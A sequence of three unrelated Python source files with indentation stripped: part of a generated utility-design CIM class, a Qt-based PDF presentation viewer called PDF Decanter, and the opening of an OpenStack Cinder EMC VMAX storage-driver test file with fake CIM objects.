#: The quantity of the CU being assigned to this location.
self.cuQuantity = cuQuantity
self._ConditionFactors = []
self.ConditionFactors = [] if ConditionFactors is None else ConditionFactors
self._CompatibleUnits = []
self.CompatibleUnits = [] if CompatibleUnits is None else CompatibleUnits
self._WorkTasks = []
self.WorkTasks = [] if WorkTasks is None else WorkTasks
self._Designs = []
self.Designs = [] if Designs is None else Designs
self._CUGroups = []
self.CUGroups = [] if CUGroups is None else CUGroups
self._DesignLocation = None
self.DesignLocation = DesignLocation
self.status = status
super(DesignLocationCU, self).__init__(*args, **kw_args)
_attrs = ["energizationFlag", "cuUsage", "removalDate", "cuAction", "cuAccount", "cuQuantity"]
_attr_types = {"energizationFlag": bool, "cuUsage": str, "removalDate": str, "cuAction": str, "cuAccount": str, "cuQuantity": str}
_defaults = {"energizationFlag": False, "cuUsage": '', "removalDate": '', "cuAction": "install", "cuAccount": '', "cuQuantity": ""}
_enums = {"cuAction": "WorkActionKind"}
_refs = ["ConditionFactors", "CompatibleUnits", "WorkTasks", "Designs", "CUGroups", "DesignLocation", "status"]
_many_refs = ["ConditionFactors", "CompatibleUnits", "WorkTasks", "Designs", "CUGroups"]
def getConditionFactors(self):
return self._ConditionFactors
def setConditionFactors(self, value):
for p in self._ConditionFactors:
filtered = [q for q in p.DesignLocationCUs if q != self]
self._ConditionFactors._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._ConditionFactors = value
ConditionFactors = property(getConditionFactors, setConditionFactors)
def addConditionFactors(self, *ConditionFactors):
for obj in ConditionFactors:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._ConditionFactors.append(obj)
def removeConditionFactors(self, *ConditionFactors):
for obj in ConditionFactors:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._ConditionFactors.remove(obj)
def getCompatibleUnits(self):
return self._CompatibleUnits
def setCompatibleUnits(self, value):
for p in self._CompatibleUnits:
filtered = [q for q in p.DesignLocationCUs if q != self]
self._CompatibleUnits._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._CompatibleUnits = value
CompatibleUnits = property(getCompatibleUnits, setCompatibleUnits)
def addCompatibleUnits(self, *CompatibleUnits):
for obj in CompatibleUnits:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._CompatibleUnits.append(obj)
def removeCompatibleUnits(self, *CompatibleUnits):
for obj in CompatibleUnits:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._CompatibleUnits.remove(obj)
def getWorkTasks(self):
return self._WorkTasks
def setWorkTasks(self, value):
for p in self._WorkTasks:
filtered = [q for q in p.DesignLocationCUs if q != self]
self._WorkTasks._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._WorkTasks = value
WorkTasks = property(getWorkTasks, setWorkTasks)
def addWorkTasks(self, *WorkTasks):
for obj in WorkTasks:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._WorkTasks.append(obj)
def removeWorkTasks(self, *WorkTasks):
for obj in WorkTasks:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._WorkTasks.remove(obj)
def getDesigns(self):
return self._Designs
def setDesigns(self, value):
for p in self._Designs:
filtered = [q for q in p.DesignLocationsCUs if q != self]
self._Designs._DesignLocationsCUs = filtered
for r in value:
if self not in r._DesignLocationsCUs:
r._DesignLocationsCUs.append(self)
self._Designs = value
Designs = property(getDesigns, setDesigns)
def addDesigns(self, *Designs):
for obj in Designs:
if self not in obj._DesignLocationsCUs:
obj._DesignLocationsCUs.append(self)
self._Designs.append(obj)
def removeDesigns(self, *Designs):
for obj in Designs:
if self in obj._DesignLocationsCUs:
obj._DesignLocationsCUs.remove(self)
self._Designs.remove(obj)
def getCUGroups(self):
return self._CUGroups
def setCUGroups(self, value):
for p in self._CUGroups:
filtered = [q for q in p.DesignLocationCUs if q != self]
self._CUGroups._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._CUGroups = value
CUGroups = property(getCUGroups, setCUGroups)
def addCUGroups(self, *CUGroups):
for obj in CUGroups:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._CUGroups.append(obj)
def removeCUGroups(self, *CUGroups):
for obj in CUGroups:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._CUGroups.remove(obj)
def getDesignLocation(self):
return self._DesignLocation
def setDesignLocation(self, value):
if self._DesignLocation is not None:
filtered = [x for x in self.DesignLocation.DesignLocationCUs if x != self]
self._DesignLocation._DesignLocationCUs = filtered
self._DesignLocation = value
if self._DesignLocation is not None:
if self not in self._DesignLocation._DesignLocationCUs:
self._DesignLocation._DesignLocationCUs.append(self)
DesignLocation = property(getDesignLocation, setDesignLocation)
status = None
|
|
# Copyright 2012-2014 Hans Meine <hans_meine@gmx.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .dynqt import qt, QtCore, QtGui, QtWidgets, QtOpenGL, getprop as p
import numpy, os, sys, time, math, operator
from . import bz2_pickle
from . import decomposer, slide_renderer
__version__ = "0.1"
PADDING_X = 0.03 # 3% of frame width
PADDING_Y = 0.03 # 3% of frame height
LINEBREAK_PADDING = 2.5 * PADDING_Y
INDENT_X = 0 # 0.125
class GeometryAnimation(QtCore.QVariantAnimation):
def __init__(self, item, parent = None):
QtCore.QVariantAnimation.__init__(self, parent)
self._item = item
def updateCurrentValue(self, value):
self._item.setPos(value.topLeft())
self._item.setScale(value.width())
class PDFDecanter(QtCore.QObject):
"""Main presentation program using the QGraphicsView framework for
rendering.
It is supported to use an existing view for the presentation, so
this class does not directly represent a window (or widget).
Instead, eventFilter() is used to catch events for the view (and
scene), and pass them on to methods like resizeEvent(), simulating
the usual methods of a regular QWidget.
The QGraphicsScene is set to the window size (and this relation is
maintained in resizeEvent). The root item in the scene is a
QGraphicsWidget (_presentationItem) that indirectly contains a
grid (cf. _setupGrid) of SlideRenderer items (_renderers) with a
layout used for the overview mode. The _presentationItem is used
for zooming out into the overview mode and back. Between the
_presentationItem and the renderers, there is a viewport
(cf. _slideViewport) that serves as a clipping rect, in order to
hide neighboring slides in case of a larger window (e.g. 16:9
fullscreen with 4:3 slides)."""
def __init__(self, view = None, slideSize = (1024, 768)):
QtCore.QObject.__init__(self)
self._slideSize = slideSize
if view is None:
view = QtWidgets.QGraphicsView()
w, h = slideSize
view.resize(w, h)
self._view = view
self._view.installEventFilter(self)
self._view.setRenderHints(QtGui.QPainter.Antialiasing | QtGui.QPainter.SmoothPixmapTransform)
self._view.setFrameStyle(QtWidgets.QFrame.NoFrame)
self._view.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self._view.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
if view.scene() is not None:
self._scene = view.scene()
self._scene.setSceneRect(0, 0, p(self._view.width), p(self._view.height))
else:
self._scene = QtWidgets.QGraphicsScene(0, 0, p(self._view.width), p(self._view.height))
self._view.setScene(self._scene)
self._scene.setBackgroundBrush(QtCore.Qt.black)
self._scene.installEventFilter(self) # for MouseButtonRelease events
self._presentationItem = QtWidgets.QGraphicsWidget()
self._scene.addItem(self._presentationItem)
self._slideViewport = QtWidgets.QGraphicsRectItem(self._presentationItem)
self._slideViewport.setFlag(QtWidgets.QGraphicsItem.ItemClipsChildrenToShape)
self._cursor = None
self._renderers = None
self._currentFrameIndex = None
self._gotoSlideIndex = None
self._gotoSlideTimer = QtCore.QTimer(self)
self._gotoSlideTimer.setSingleShot(True)
self._gotoSlideTimer.setInterval(1000)
self._gotoSlideTimer.timeout.connect(self._clearGotoSlide)
self._hideMouseTimer = QtCore.QTimer(self)
self._hideMouseTimer.setSingleShot(True)
self._hideMouseTimer.setInterval(1000)
self._hideMouseTimer.timeout.connect(self._hideMouse)
self._hideMouseTimer.start()
self._view.viewport().setMouseTracking(True)
self._view.viewport().installEventFilter(self)
self._inOverview = False
self._loadConfig()
def _loadConfig(self):
self._configDirectory = os.path.expanduser('~/.pdf_decanter')
self._classifierFilename = os.path.join(self._configDirectory, 'classifier')
decomposer.load_classifier(self._classifierFilename)
def enableGL(self):
try:
from OpenGL import GL
except ImportError:
sys.stderr.write("WARNING: OpenGL could not be imported, running without GL...\n")
return False
glWidget = QtOpenGL.QGLWidget(QtOpenGL.QGLFormat(QtOpenGL.QGL.SampleBuffers))
if not glWidget.isValid():
sys.stderr.write("WARNING: Could not create valid OpenGL context, running without GL...\n")
return False
self._view.setViewport(glWidget)
self._view.setViewportUpdateMode(QtWidgets.QGraphicsView.FullViewportUpdate)
self._view.viewport().setMouseTracking(True)
self._view.viewport().installEventFilter(self)
return True
def view(self):
return self._view
def slideSize(self):
"""Return size at which to render PDFs"""
return self._slideSize
def presentationBounds(self):
result = QtCore.QRectF()
for renderer in self._renderers:
br = renderer.boundingRect()
br.translate(p(renderer.pos))
result |= br
return result
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.MouseMove:
self.mouseMoveEvent(event)
return False
event.ignore()
if obj is self._view:
if event.type() == QtCore.QEvent.KeyPress:
self.keyPressEvent(event)
elif event.type() == QtCore.QEvent.Resize:
self.resizeEvent(event)
elif event.type() == QtCore.QEvent.Wheel:
self.wheelEvent(event)
elif obj is self._scene:
if event.type() == QtCore.QEvent.GraphicsSceneMousePress:
self.mousePressEvent(event)
elif event.type() == QtCore.QEvent.GraphicsSceneMouseRelease:
self.mouseReleaseEvent(event)
if event.isAccepted():
return True
return False
def resizeEvent(self, e):
assert p(self._view.size) == e.size()
self._scene.setSceneRect(0, 0, p(self._view.width), p(self._view.height))
self._adjustSlideViewport()
pres = self._presentationItem
if not self._inOverview:
renderer = self._currentRenderer()
if not renderer:
return
scale, margin = self._maxpectScaleAndMargin(renderer.frame().sizeF())
pres.setPos(QtCore.QPointF(margin.width(), margin.height()) - p(renderer.pos) * scale)
else:
scale = self._overviewScale()
pres.setScale(scale)
def _adjustSlideViewport(self):
if self._currentFrameIndex is None:
return
if not self._inOverview:
renderer = self._currentRenderer()
viewportRect = QtCore.QRectF(p(renderer.pos), p(renderer.size))
else:
viewportRect = self.presentationBounds()
self._slideViewport.setRect(viewportRect)
def wheelEvent(self, e):
if self._inOverview:
overview = self._presentationItem
overviewPos = p(overview.pos)
overviewPos.setY(overviewPos.y() + e.delta())
self._adjustOverviewPos(overviewPos, self._overviewScale())
overview.setPos(overviewPos)
else:
e.ignore()
def mouseMoveEvent(self, e):
self._view.unsetCursor()
self._hideMouseTimer.start()
def _hideMouse(self):
self._view.setCursor(QtCore.Qt.BlankCursor)
def mousePressEvent(self, e):
self._mousePressPos = e.screenPos()
def mouseReleaseEvent(self, e):
wasClick = (self._mousePressPos is not None) \
and (e.screenPos() - self._mousePressPos).manhattanLength() < 6
self._mousePressPos = None
if not wasClick:
return
if e.modifiers() & QtCore.Qt.ShiftModifier:
renderer = None
for item in self._scene.items(e.scenePos()):
if item in self._renderers:
renderer = item
break
if renderer is not None:
for item in self._scene.items(e.scenePos()):
patch = renderer.patchOf(item)
if patch is not None:
if self.toggleNavigationFlag(patch):
return
QtWidgets.qApp.beep() # no valid item found
return
if not self._inOverview:
# RMB: overview
if e.button() == QtCore.Qt.RightButton:
self.showOverview()
# MMB: go back one frame (if not at beginning):
elif e.button() == QtCore.Qt.MiddleButton:
if self._currentFrameIndex > 0:
self.gotoFrame(self._currentFrameIndex - 1)
# LMB: advance one frame (if not at end):
else:
if self._currentFrameIndex < self._slides.frameCount() - 1:
self.gotoFrame(self._currentFrameIndex + 1)
else:
# find frame clicked on in overview and jump to it:
for item in self._scene.items(e.scenePos()):
#if isinstance(item, slide_renderer.SlideRenderer):
if item in self._renderers:
slideIndex = self._renderers.index(item)
self.gotoFrame(self._slides[slideIndex].currentFrame().frameIndex())
break
def loadPDF(self, pdfFilename, cacheFilename = None, useCache = None, createCache = False):
slides = None
pdfFilename = os.path.abspath(pdfFilename)
if cacheFilename is None:
dirname, basename = os.path.split(pdfFilename)
w, h = self.slideSize()
cacheFilename = os.path.join(
dirname, "pdf_decanter_cache_%s_%dx%d.bz2" % (
os.path.splitext(basename)[0], w, h))
if useCache is not False:
if os.path.exists(cacheFilename):
if os.path.getmtime(cacheFilename) >= os.path.getmtime(pdfFilename) or useCache:
sys.stdout.write("reading cache '%s'...\n" % cacheFilename)
try:
slides = bz2_pickle.unpickle(cacheFilename)
except Exception as e:
sys.stderr.write("FAILED to load cache (%s), re-rendering...\n" % (e, ))
if slides is None:
wallClockTime = time.time()
cpuTime = time.clock()
slides = decomposer.decompose_pdf(pdfFilename, sizePX = self.slideSize())
print("complete rendering took %.3gs. (%.3gs. real time)" % (
time.clock() - cpuTime, time.time() - wallClockTime))
if createCache:
sys.stdout.write("caching in '%s'...\n" % cacheFilename)
bz2_pickle.pickle(cacheFilename, slides)
self.setSlides(slides)
self._view.setWindowFilePath(pdfFilename)
def setSlides(self, slides):
self._slides = slides
assert not self._renderers, "FIXME: delete old renderers / graphics items"
self._renderers = [slide_renderer.SlideRenderer(s, self._slideViewport) for s in slides]
for r in self._renderers:
r.setLinkHandler(self.followLink)
self._setupGrid()
self.gotoFrame(0)
def slides(self):
return self._slides
def toggleNavigationFlag(self, patch):
w, h = self.slideSize()
if patch.flag(patch.FLAG_HEADER):
patch.setFlag(patch.FLAG_HEADER, False)
elif patch.flag(patch.FLAG_FOOTER):
patch.setFlag(patch.FLAG_FOOTER, False)
elif patch.boundingRect().bottom() < h/2:
patch.setFlag(patch.FLAG_HEADER, True)
elif patch.boundingRect().top() > h/2:
patch.setFlag(patch.FLAG_FOOTER, True)
else:
return False # cannot decide which flag it it
decomposer.add_navigation_example(patch)
if not os.path.exists(self._configDirectory):
os.mkdir(self._configDirectory)
decomposer.save_classifier(self._classifierFilename)
decomposer.classify_navigation(self._slides.frames())
if slide_renderer.FrameRenderer.DEBUG:
for r in self._renderers:
r.resetItems()
return True
def snapshot(self, filename = 'snapshot.svg'):
svg = qt.QtSvg.QSvgGenerator()
svg.setFileName(filename)
svg.setSize(QtCore.QSize(*self.slideSize()))
p = QtGui.QPainter(svg)
self._scene.render(p)
p.end()
svg.outputDevice().close()
def _setupGrid(self):
self._overviewColumnCount = min(5, int(math.ceil(math.sqrt(len(self._slides)))))
slideLevel = numpy.zeros((len(self._slides), ), dtype = int)
infos = self._slides.pdfInfos()
if infos and infos.outline():
for level, title, frameIndex in infos.outline():
slideLevel[self._slides.frame(frameIndex).slide().slideIndex()] = level
# prevent too many linebreaks (very fine-grained PDF outline):
while slideLevel.max() > 0 and numpy.diff(numpy.nonzero(slideLevel)[0]).mean() < self._overviewColumnCount-1:
slideLevel[slideLevel == slideLevel.max()] = 0
x = y = col = rowHeight = 0
lastLineBreak = previousWidth = 0
for i, renderer in enumerate(self._renderers):
if col > 0:
x += PADDING_X * max(previousWidth, renderer.slide().sizeF().width())
if slideLevel[i] and lastLineBreak < i - 1:
y += (1.0 + PADDING_Y + LINEBREAK_PADDING / slideLevel[i]) * rowHeight
x = col = rowHeight = 0
lastLineBreak = i
elif col >= self._overviewColumnCount:
y += (1.0 + PADDING_Y) * rowHeight
x = INDENT_X * renderer.slide().sizeF().width() if lastLineBreak else 0
col = rowHeight = 0
renderer.setPos(x, y)
x += renderer.slide().sizeF().width()
previousWidth = renderer.slide().sizeF().width()
rowHeight = max(rowHeight, renderer.slide().sizeF().height())
col += 1
def _updateCursor(self, animated):
"""Moves the cursor to the current renderer. If animated is
True, a _cursorAnimation will be set up and started, and if
the cursor target is not fully visible, the overview will also
be scrolled (animatedly). The overview pos will not be
changed if animated == False."""
if self._cursor is None:
self._cursor = QtWidgets.QGraphicsWidget(self._slideViewport)
self._cursorRect = QtWidgets.QGraphicsRectItem(self._cursor)
self._cursorRect.setPen(QtGui.QPen(QtCore.Qt.yellow, 25))
self._cursorRect.setBrush(QtGui.QBrush(QtGui.QColor(255, 255, 0, 100)))
self._cursor.setZValue(-10)
self._cursorPos = None
r = QtCore.QRectF(p(self._currentRenderer().pos),
self._currentRenderer().slide().sizeF())
if not animated:
self._cursor.setPos(r.topLeft())
self._cursorRect.setRect(QtCore.QRectF(QtCore.QPointF(0, 0), r.size()))
else:
self._cursorAnimation = QtCore.QPropertyAnimation(self._cursor, "pos")
self._cursorAnimation.setDuration(100)
self._cursorAnimation.setStartValue(p(self._cursor.pos))
self._cursorAnimation.setEndValue(r.topLeft())
self._cursorAnimation.start()
pres = self._presentationItem
if not p(self._scene.sceneRect).contains(
r.center() * p(pres.scale) + p(pres.pos)):
self._animateOverviewGroup(self._overviewPosForCursor(r), p(pres.scale))
def _adjustOverviewPos(self, pos, scale):
"""adjust position in order to prevent ugly black margins"""
# overview smaller than scene?
if p(self._scene.sceneRect).height() > self.presentationBounds().height() * scale:
# yes, center overview (evenly distributing black margin):
pos.setY(0.5 * (p(self._scene.sceneRect).height() - self.presentationBounds().height() * scale))
elif pos.y() > 0.0:
# no, prevent black margin at top:
pos.setY(0.0)
else:
# prevent black margin at bottom:
minY = p(self._scene.sceneRect).height() - self.presentationBounds().height() * scale
if pos.y() < minY:
pos.setY(minY)
def _animateOverviewGroup(self, pos, scale):
self._adjustOverviewPos(pos, scale)
currentGeometry = QtCore.QRectF(p(self._presentationItem.pos),
QtCore.QSizeF(p(self._presentationItem.scale),
p(self._presentationItem.scale)))
targetGeometry = QtCore.QRectF(pos, QtCore.QSizeF(scale, scale))
self._overviewAnimation = GeometryAnimation(self._presentationItem)
self._overviewAnimation.setStartValue(currentGeometry)
self._overviewAnimation.setEndValue(targetGeometry)
self._overviewAnimation.setDuration(300)
self._overviewAnimation.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self._overviewAnimation.finished.connect(self._resetOverviewAnimation)
self._overviewAnimation.start()
def _resetOverviewAnimation(self):
if not self._overviewAnimation:
return
self._overviewAnimation.stop()
self._overviewAnimation = None
self._adjustSlideViewport()
def _overviewScale(self):
"""Return presentation scale that fills the view width with the overview."""
return p(self._scene.sceneRect).width() / self.presentationBounds().width()
def _overviewPosForCursor(self, r = None):
if r is None:
r = self._cursor.childItems()[0].boundingRect()
r.translate(p(self._cursor.pos))
s = self._overviewScale()
y = (0.5 * p(self._scene.sceneRect).height() - r.center().y() * s)
return QtCore.QPointF(0, y)
def showOverview(self):
self._updateCursor(animated = False)
self._cursorPos = None
for r in self._renderers:
r.showCustomContent()
self._animateOverviewGroup(self._overviewPosForCursor(), self._overviewScale())
self._inOverview = True
self._adjustSlideViewport()
def _currentFrame(self):
"""Returns current Frame object (or None, in initialization phase)."""
if self._currentFrameIndex is None:
return None
return self._slides.frame(self._currentFrameIndex)
def _currentSlideIndex(self):
"""Returns current slide index (or None, in initialization phase)."""
frame = self._currentFrame()
if frame is None:
return None
return frame.slide().slideIndex()
def _currentRenderer(self):
"""Returns currently active SlideRenderer (or None, in initialization phase)."""
slideIndex = self._currentSlideIndex()
if slideIndex is None:
return None
return self._renderers[slideIndex]
def _maxpectScaleAndMargin(self, frameSize):
"""Returns presentation scale and margin (for one side,
i.e. half of the excessive space) for centering a frame of the
given size in the current view."""
windowSize = p(self._scene.sceneRect).size()
scale = min(windowSize.width() / frameSize.width(),
windowSize.height() / frameSize.height())
margin = (windowSize - scale * frameSize) / 2.0
return scale, margin
def gotoFrame(self, frameIndex):
"""Identifies renderer responsible for the given frame and
lets it show that frame. If we're in overview mode, the scene
is zoomed in to the above renderer."""
targetFrame = self._slides.frame(frameIndex)
renderer = self._renderers[targetFrame.slide().slideIndex()]
renderer.uncover()
animated = (not self._inOverview) \
and self._currentFrameIndex is not None
sourceFrame = self._currentRenderer().frame() if animated else None
renderer.showFrame(targetFrame.subIndex(), animateFrom = sourceFrame)
self._currentFrameIndex = frameIndex
scale, margin = self._maxpectScaleAndMargin(targetFrame.sizeF())
targetPresentationPos = QtCore.QPointF(margin.width(), margin.height()) - p(renderer.pos) * scale
if not self._inOverview:
self._presentationItem.setPos(targetPresentationPos)
self._adjustSlideViewport()
else:
self._inOverview = False
self._animateOverviewGroup(targetPresentationPos, scale)
def _clearGotoSlide(self):
self._gotoSlideIndex = None
def followLink(self, link):
if self._inOverview:
return False
if isinstance(link, int):
frameIndex = link
self.gotoFrame(frameIndex)
self._mousePressPos = None # don't handle click again in mouseReleaseEvent
return True
return False
def keyPressEvent(self, event):
if event.text() == 'D':
slide_renderer.toggleDebug()
for r in self._renderers:
r.resetItems()
if event.text() == 'F':
win = self._view.window()
if win.isFullScreen():
win.showNormal()
else:
win.showFullScreen()
event.accept()
elif event.key() in (QtCore.Qt.Key_F, QtCore.Qt.Key_L):
r = self._currentRenderer()
r.showFrame(0 if event.key() == QtCore.Qt.Key_F else len(r.slide()) - 1)
event.accept()
elif event.text() and event.text() in '0123456789':
if self._gotoSlideIndex is None:
self._gotoSlideIndex = 0
self._gotoSlideIndex = self._gotoSlideIndex * 10 + int(event.text())
self._gotoSlideTimer.start()
event.accept()
elif event.key() == QtCore.Qt.Key_Return:
if self._gotoSlideIndex is not None:
event.accept()
slideIndex = self._gotoSlideIndex - 1
self._gotoSlideIndex = None
self.gotoFrame(self._slides[slideIndex].currentFrame().frameIndex())
elif event.text() == 'Q':
self._view.window().close()
event.accept()
elif event.text() == 'P':
headerItems = sum((r.headerItems() for r in self._renderers), [])
footerItems = sum((r.footerItems() for r in self._renderers), [])
if headerItems and footerItems:
onoff = headerItems[0].isVisible() + 2*footerItems[0].isVisible()
onoff = (onoff + 1) % 4
for headerItem in headerItems:
headerItem.setVisible(onoff % 2)
for footerItem in footerItems:
footerItem.setVisible(onoff // 2)
event.accept()
elif headerItems or footerItems:
items = headerItems or footerItems
onoff = not items[0].isVisible()
for item in items:
item.setVisible(onoff)
event.accept()
else:
sys.stderr.write('DEBUG: no header/footer items found.\n')
if event.isAccepted():
return
if self._inOverview:
if event.key() in (QtCore.Qt.Key_Right, QtCore.Qt.Key_Left,
QtCore.Qt.Key_Down, QtCore.Qt.Key_Up):
self._handleCursorKeyInOverview(event)
event.accept()
elif event.key() in (QtCore.Qt.Key_Home, ):
if self._currentFrameIndex:
self._currentFrameIndex = 0
self._updateCursor(animated = True)
event.accept()
elif event.text() == 'U':
for renderer in self._renderers:
renderer.uncoverAll()
event.accept()
elif event.text() == 'R':
for renderer in self._renderers:
renderer.showFrame(0)
renderer.uncover(False)
if self._currentFrameIndex:
self._currentFrameIndex = 0
self._updateCursor(animated = True)
event.accept()
elif event.key() in (QtCore.Qt.Key_Tab, QtCore.Qt.Key_Return, QtCore.Qt.Key_Space):
self.gotoFrame(self._currentFrameIndex)
event.accept()
else:
if event.key() in (QtCore.Qt.Key_Space, QtCore.Qt.Key_Right, QtCore.Qt.Key_PageDown):
if self._currentFrameIndex < self._slides.frameCount() - 1:
self.gotoFrame(self._currentFrameIndex + 1)
event.accept()
elif event.key() in (QtCore.Qt.Key_Backspace, QtCore.Qt.Key_Left, QtCore.Qt.Key_PageUp):
if self._currentFrameIndex > 0:
self.gotoFrame(self._currentFrameIndex - 1)
event.accept()
elif event.key() in (QtCore.Qt.Key_Home, ):
if self._currentFrameIndex:
self.gotoFrame(0)
event.accept()
elif event.key() in (QtCore.Qt.Key_Tab, ):
self.showOverview()
event.accept()
def _handleCursorKeyInOverview(self, event):
item = self._currentRenderer()
r = item.sceneBoundingRect()
if self._cursorPos is None:
self._cursorPos = r.center()
desiredSlideIndex = None
# naming of variables follows downwards-case, other cases are rotated:
if event.key() == QtCore.Qt.Key_Down:
ge = operator.ge
bottom = r.bottom()
getTop = QtCore.QRectF.top
getX = QtCore.QPointF.x
getY = QtCore.QPointF.y
setY = QtCore.QPointF.setY
sortDirection = 1 # ascending Y
mustOverlapInY = False
elif event.key() == QtCore.Qt.Key_Up:
ge = operator.le
bottom = r.top()
getTop = QtCore.QRectF.bottom
getX = QtCore.QPointF.x
getY = QtCore.QPointF.y
setY = QtCore.QPointF.setY
sortDirection = -1 # descending Y
mustOverlapInY = False
elif event.key() == QtCore.Qt.Key_Right:
ge = operator.ge
bottom = r.right()
getTop = QtCore.QRectF.left
getX = QtCore.QPointF.y
getY = QtCore.QPointF.x
setY = QtCore.QPointF.setX
sortDirection = 1 # ascending X
mustOverlapInY = True
elif event.key() == QtCore.Qt.Key_Left:
ge = operator.le
bottom = r.left()
getTop = QtCore.QRectF.right
getX = QtCore.QPointF.y
getY = QtCore.QPointF.x
setY = QtCore.QPointF.setX
sortDirection = -1 # descending X
mustOverlapInY = True
# handle all cases, with naming of variables following downwards-case (see above)
belowItems = []
for otherItem in self._renderers:
r2 = otherItem.sceneBoundingRect()
if ge(getTop(r2), bottom):
if mustOverlapInY:
if r2.bottom() < r.top() or r2.top() > r.bottom():
continue # don't jump between rows
c2 = r2.center()
# sort by Y first (moving as few as possible in cursor dir.),
# then sort by difference in X to "current pos"
# (self._cursorPos is similar to r.center(), but allows to
# move over rows with fewer items without losing the original
# x position)
belowItems.append((sortDirection * getY(c2),
abs(getX(c2) - getX(self._cursorPos)),
otherItem))
if belowItems:
belowItems.sort()
sortY, _, desiredSlide = belowItems[0]
centerY = sortDirection * sortY
desiredSlideIndex = self._renderers.index(desiredSlide)
setY(self._cursorPos, centerY)
else:
currentSlideIndex = self._currentSlideIndex()
if event.key() == QtCore.Qt.Key_Right:
if currentSlideIndex < len(self._slides)-1:
desiredSlideIndex = currentSlideIndex + 1
elif event.key() == QtCore.Qt.Key_Left:
if currentSlideIndex > 0:
desiredSlideIndex = currentSlideIndex - 1
if desiredSlideIndex is not None:
self._currentFrameIndex = self._slides[desiredSlideIndex].currentFrame().frameIndex()
self._updateCursor(animated = True)
def start(view = None, show = True, **kwargs):
global app
hasApp = QtWidgets.QApplication.instance()
if not hasApp:
app = QtWidgets.QApplication(sys.argv)
else:
app = hasApp
app.setApplicationName("PDF Decanter")
app.setApplicationVersion(__version__)
result = PDFDecanter(view = view, **kwargs)
result.hadEventLoop = hasattr(app, '_in_event_loop') and app._in_event_loop # IPython support
if show and view is None:
result.view().show()
if sys.platform == "darwin":
result.view().raise_()
return result
|
|
# Copyright (c) 2012 - 2014 EMC Corporation, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import tempfile
import time
from xml.dom.minidom import Document
import mock
from cinder import exception
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume.drivers.emc.emc_vmax_common import EMCVMAXCommon
from cinder.volume.drivers.emc.emc_vmax_fast import EMCVMAXFast
from cinder.volume.drivers.emc.emc_vmax_fc import EMCVMAXFCDriver
from cinder.volume.drivers.emc.emc_vmax_iscsi import EMCVMAXISCSIDriver
from cinder.volume.drivers.emc.emc_vmax_masking import EMCVMAXMasking
from cinder.volume.drivers.emc.emc_vmax_utils import EMCVMAXUtils
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
CINDER_EMC_CONFIG_DIR = '/etc/cinder/'
class EMC_StorageVolume(dict):
pass
class CIM_StorageExtent(dict):
pass
class SE_InitiatorMaskingGroup(dict):
pass
class SE_ConcreteJob(dict):
pass
class SE_StorageHardwareID(dict):
pass
class Fake_CIMProperty():
def fake_getCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = True
return cimproperty
def fake_getBlockSizeCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = '512'
return cimproperty
def fake_getConsumableBlocksCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = '12345'
return cimproperty
def fake_getIsConcatenatedCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = True
return cimproperty
def fake_getIsCompositeCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = False
return cimproperty
class Fake_CIM_TierPolicyServiceCapabilities():
def fake_getpolicyinstance(self):
classinstance = Fake_CIM_TierPolicyServiceCapabilities()
classcimproperty = Fake_CIMProperty()
cimproperty = classcimproperty.fake_getCIMProperty()
cimproperties = {u'SupportsTieringPolicies': cimproperty}
classinstance.properties = cimproperties
return classinstance
class FakeCIMInstanceName(dict):
def fake_getinstancename(self, classname, bindings):
instancename = FakeCIMInstanceName()
for key in bindings:
instancename[key] = bindings[key]
instancename.classname = classname
instancename.namespace = 'root/emc'
return instancename
class FakeDB():
def volume_update(self, context, volume_id, model_update):
pass
def volume_get(self, context, volume_id):
conn = FakeEcomConnection()
objectpath = {}
objectpath['CreationClassName'] = 'Symm_StorageVolume'
if volume_id == 'vol1':
device_id = '1'
objectpath['DeviceID'] = device_id
else:
objectpath['DeviceID'] = volume_id
return conn.GetInstance(objectpath)
class EMCVMAXCommonData():
connector = {'ip': '10.0.0.2',
'initiator': 'iqn.1993-08.org.debian: 01: 222',
'wwpns': ["123456789012345", "123456789054321"],
'wwnns': ["223456789012345", "223456789054321"],
'host': 'fakehost'}
default_storage_group = (
u'//10.108.246.202/root/emc: SE_DeviceMaskingGroup.InstanceID='
